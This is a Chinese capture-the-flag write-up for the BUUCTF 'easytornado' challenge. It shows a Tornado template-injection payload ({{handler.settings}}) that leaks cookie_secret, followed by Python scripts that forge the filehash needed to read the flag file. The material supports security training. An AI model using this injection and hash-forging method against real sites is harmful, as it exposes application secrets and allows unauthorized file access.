BUUCTF题writeup《easytornado》

tornado render模板注入
访问网址
image.png

flag.txt

image.png

welcome.txt

image.png

hints.txt

image.png

根据上面的信息,我们知道flag在/fllllllllllllag文件中

render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页render配合Tornado使用

最后就是这段代码md5(cookie_secret+md5(filename)),再来分析我们访问的连接

http://4dd65e36-edbf-4402-b6a3-75993b8c618d.node3.buuoj.cn/file?filename=/flag.txt&filehash=284090432706edeffa4679e60f0fff03

猜测md5加密过后的值就是url中filehash对应的值,想获得flag只要我们在filename中传入/fllllllllllllag文件和filehash,所以关键是获取cookie_secret

在tornado模板中,存在一些可以访问的快速对象,比如{{escape(handler.settings["cookie"])}},这个其实就是handler.settings对象,里面存储一些环境变量,具体分析请参考《python SSTI tornado render模板注入

观察错误页面,发现页面返回的由msg的值决定

image.png

修改该msg的值注入{{handler.settings}},获得环境变量

image.png

image.png

得到cookie_secret的值,根据上面的md5进行算法重构,就可以得到filehash,这里给出py3的转换脚本

import hashlib
hash = hashlib.md5()				#构造函数获得一个md5对象

filename='/fllllllllllllag'				
cookie_secret="ad53693f-47f6-4c89-b072-0673e0fbbc17"	
hash.update(filename.encode('utf-8'))	 #python3  #使用md5对象的update方法转换utf-8
s1=hash.hexdigest()				#获取16进制str类型的消息摘要
hash = hashlib.md5()
hash.update((cookie_secret+s1).encode('utf-8'))
print(hash.hexdigest())


Python的hashlib提供了常见的摘要算法,如MD5、SHA1等
#摘要算法就是通过摘要函数f()对任意长度的数据data计算出固定长度的摘要digest,目的是为了发现原始数据是否被人篡改
#摘要算法之所以能指出数据是否被篡改过,就是因为摘要函数是一个单向函数,计算f(data)容易,但通过digest反推data却非常困难。而且,对原始数据做一个bit的修改,都会导致计算出的摘要完全不同

import hashlib

filename='/fllllllllllllag'				
cookie_secret="ad53693f-47f6-4c89-b072-0673e0fbbc17"	

def Payload(string):
    md5 = hashlib.md5()
    md5.update(string.encode('utf-8'))
    return md5.hexdigest()

def merge():
    print(Payload(cookie_secret + Payload(filename)))
    
merge()

得到filehash=ceba5d7a8acd8c4fb77cfb58c9534971,获取flag

image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值